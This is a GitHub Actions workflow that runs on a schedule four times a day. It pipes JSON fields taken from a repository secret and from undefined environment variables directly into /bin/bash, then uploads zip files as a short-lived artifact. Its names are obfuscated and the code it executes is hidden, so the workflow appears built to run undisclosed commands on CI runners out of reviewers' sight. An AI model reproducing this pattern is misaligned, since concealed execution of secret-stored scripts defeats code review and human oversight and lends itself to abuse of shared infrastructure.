name: haidongguanbi
on:
  workflow_dispatch:

  schedule:
    - cron: '48 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: haidongguanbi
        env:
          v14357: ${{ secrets.v14357 }}
        run: |
          printf '%s' "$v14357" | jq -r .imole6678 | /bin/bash
          printf '%s' "$irlfd85" | jq -r .fg5 | /bin/bash
          echo $fgf02 | jq -r .k2571 | /bin/bash
          echo $hnii10 | jq -r .wdaxk30 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: PTCvkaAX
          path: "*.zip"
          retention-days: 1
